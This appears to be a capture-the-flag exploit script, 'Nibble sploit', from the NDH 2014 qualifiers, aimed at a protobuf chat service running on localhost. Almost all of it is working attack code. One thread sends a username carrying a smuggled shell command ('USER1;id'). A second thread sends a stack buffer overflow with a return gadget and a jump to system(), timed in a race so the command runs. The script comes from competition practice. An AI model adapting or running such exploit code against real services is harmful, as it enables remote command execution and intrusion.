#ndh2k14 #ndhquals Nibble sploit

1. #!/usr/bin/env python2
2. # -*- coding: utf-8 -*-
3. # quals NDH 2014
4. # Nibble Sploit
5. # pollypocket - y0ug
6.  
7. import time
8. import curses
9. import socket
10. import chat_protocol_pb2
11. from curses.textpad import rectangle
12. from struct import pack
13. import threading
14. import signal
15. import sys
16. import threading
17. import struct
18.  
19.  
20. class NetWrapper:
21.     def __init__(self):
22.         pass
23.  
24.     def connect(self):
25.         try:
26.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
27.             s.settimeout(60);
28.             #46.231.151.147
29.             #s.connect(("54.217.202.218", 4567))
30.             s.connect(("127.0.0.1", 4567))
31.             self.socket = s
32.             return True
33.         except:
34.             return False
35.  
36.     def auth(self,username):
37.         authpacket = chat_protocol_pb2.AuthPacket()
38.         authpacket.username = username
39.         self.username = username
40.         data = "1" + authpacket.SerializeToString()
41.         self.socket.send(pack('<I', len(data)) + data)
42.  
43.     def wait_authresponse(self):
44.         authresponse = chat_protocol_pb2.TokenResponse()
45.         authresponse.ParseFromString(self.socket.recv(1024))
46.         if authresponse.authstatus == 1:
47.             self.token = authresponse.token
48.             return True
49.         else:
50.             return False
51.  
52.     def sendmessage(self,token, username, msg):
53.         if len(msg) < 2:
54.             return
55.         usermessage = chat_protocol_pb2.ChatMessage()
56.         usermessage.cookie = token
57.         usermessage.nickname = username
58.         usermessage.textmessage = msg
59.         data = "2" + usermessage.SerializeToString()
60.         self.socket.send(pack('<I', len(data)) + data)
61.  
62.  
63. event = threading.Event()
64.  
65. def classic_user():
66.     n1 = NetWrapper()
67.     while n1.connect():
68.         event.set()
69.         n1.auth("USER1;id")
70.         event.clear()
71.         n1.socket.close()
72.         time.sleep(2)
73.  
74. def trigger_user():
75.     n1 = NetWrapper()
76.     while n1.connect():
77.         payload = "Z" * 125
78.         payload += struct.pack('<I', 0x8049d4d) # ret;
79.         payload += struct.pack('<I', 0x08048BD0) # jmp system
80.         l = len(payload)
81.         if l < 0x80:
82.             header = "\x31\x0a%c" % (chr(l))
83.         elif l < 0x100:
84.             header = "\x31\x0a%c\x01" % (chr(l))
85.         else:
86.             return
87.  
88.         pwn = struct.pack('<I', len(header+payload))
89.         pwn += header
90.         pwn += payload
91.  
92.         event.wait()
93.         n1.socket.send(pwn)
94.         n1.socket.close()
95.         time.sleep(1)
96.  
97. if __name__ == "__main__":
98.     thread = threading.Thread(target = classic_user)
99.     thread2 = threading.Thread(target = trigger_user)
100.     thread.start()
101.     thread2.start()
102.     thread2.join()